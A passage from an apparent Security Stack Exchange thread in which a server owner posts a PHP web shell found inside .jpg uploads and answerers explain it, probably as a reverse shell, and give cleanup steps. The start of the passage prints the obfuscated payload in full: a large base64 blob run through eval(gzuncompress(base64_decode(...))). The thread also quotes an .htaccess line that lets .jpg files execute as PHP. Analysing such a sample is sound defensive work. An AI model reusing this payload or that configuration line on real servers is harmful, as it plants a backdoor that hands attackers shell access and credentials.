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";error_reporting(0);@set_time_limit(0);eval("?>".gzuncompress(base64_decode($shell_code)));
?>

The weird part is this script has been there since April, but now is September, so I think this is not the cause, then I am using netstat for open port but once again there are nothing suspicious found. Really need your help guys

Thank you

CaffeineAddiction
  • 7,517
  • 2
  • 20
  • 40
spacetrack
  • 99
  • 1
  • 8
  • decoded version can be found here: https://www.unphp.net/decode/4d874c254ac1200965d67b3ab45a6543/ – CaffeineAddiction Sep 19 '17 at 05:00
  • A good indicator that the adversary succeeded with sql injections are errors in the database, so i would check that first. – shivelin Sep 19 '17 at 12:59
  • @shivelin yeah due to the lack of disk storage, we disable our database log, so this is quite a trouble to check from our database, but after investigate further there are nothing suspicious on our db. – spacetrack Sep 19 '17 at 14:55
  • @CaffeineAddiction thank you very much for your correction on my question and your answer really give me something new to study – spacetrack Sep 19 '17 at 14:56

2 Answers2

7

Best I can tell, someone uploaded this image to your server and then attempted to execute it by navigating to the url path of the image (which might have been run as php? depending on your security settings).

In the even that it did run, the point of the code is most likely a reverse shell. I did a bit of googling and while what you have is v2 of the code, v1 looks like (source code on github ... safe-ish). It should be noted that using a reverse shell would NOT show up in Audit Logs or User Logs ... you would instead need to check the web servers access logs for like the past 6 months for anyone accessing either of those .jpg files.

If the person was able to open a reverse shell this way then, theoretically, they would only have access to the user running the service ... and unless you did something really bad this means they had shell access to a restricted user apache which totally has read access to /etc/passwd just like all the rest of the users on the box.

ca@ca-chi:~$ ls -lah /etc/passwd
-rw-r--r-- 1 root root 2.0K Aug 28 13:09 /etc/passwd

and to be perfectly honest ... who cares? Here is the cat /etc/passwd from my private vps ... done from a non-sudo user

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
messagebus:x:107:111::/var/run/dbus:/bin/false
uuidd:x:108:112::/run/uuidd:/bin/false
dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
ntp:x:111:115::/home/ntp:/bin/false
git:x:1000:1000:Gogs Git User:/opt/containers/gogs/data/git:/bin/bash
ca:x:1001:1001:,,,:/home/ca:/bin/bash

If you take a look at the file ... it basically contains:

DESCRIPTION
       /etc/passwd contains one line for each user account, with seven fields
       delimited by colons (“:”). These fields are:
       ·   login name
       ·   optional encrypted password
       ·   numerical user ID
       ·   numerical group ID
       ·   user name or comment field
       ·   user home directory
       ·   optional user command interpreter

(source)

Note that the only concerning part of this is the optional encrypted password which by default on most systems is replaced simply with an x (feel free to check your own ... the file I posted is unmodified from its original content)

They also would have atleast read-only access to the source of all PHP files in webroot. This means that any configuration settings like the username/password to your MySQL database as well as any source / encryption-keys / user-tables / salt / pepper / ... etc. Thats kinda bad, you should maybe update the passwords on pretty much everything.

Now, it should be noted that they should have never gotten that far ... the fact that your server can execute files that are uploaded as PHP is disastrous ... and should be fixed ASAP. Further, if that part of your server was not secure ... who knows what else they got into. I personally would Nuke From Orbit as its the only way to be sure.

  • I would stand up a new VPS with better security settings for php
  • Migrate TRUSTED source code from VERSION CONTROL (specifically not from the possibly infected server)
  • Test the folders created to hold user content to verify that it can not contain executable cgi
  • Dump Original Server's SQL (if applicable) to XML or a .SQL file and run a few reg-ex searches over it to verify that it does not contain anything suspicious.
  • Migrate the user content (pictures, files, etc)
  • Lock all user accounts and force password change via Email on next login
  • Notify your user-base that you had a security breach and userdata like Username / Email / hashed?-passwords (I sure hope you stored them properly) are out in the wild and its only a matter of time before the passwords are cracked.

Good Luck

CaffeineAddiction
  • 7,517
  • 2
  • 20
  • 40
  • Woah this is very complete and really help me alot, thank you very much, I will update the password, and will migrate to other server. – spacetrack Sep 19 '17 at 07:16
1

From my experience it looks like if you had the right settings on your PHP init, those files should not been able to execute the php code inside as they end with .jpg instead of .php. So the attacker shouldn't be able to open a webshell on your server.

Also if you have this line in .htaccess, they for sure be able to execute that code.

AddType application/x-httpd-php .jpg

Of course assuming that you have been compromised and taking all the necessary actions is the way to deal with this issue.

Rory Alsop
  • 61,367
  • 12
  • 115
  • 320
Cotsios
  • 21
  • 1
  • 1
    Cotsios - unlike online forums, referring to an "above answer" does not work here, as the one you refer to may end up below yours, or another one may end up there, so if you agree with a post, use the upvote button instead of saying you agree. – Rory Alsop Sep 19 '17 at 12:58
  • Sure, thanks I will keep that in mind for the future. Thanks for the corrections. – Cotsios Sep 19 '17 at 13:15
  • The config to allow .jpg or any other file to be executed as `application/x-httpd-php` is in many places `.htaccess` is one of them ... though not the only one. This being said, if someone was able to give him a "valid" copy of the `passwd` then there was either a remote-code-exploit or relative path-ing was incorrectly configured. In either case, unless logs have been archived on a remote server ... it is safe to assume something is compromised. – CaffeineAddiction Sep 19 '17 at 16:07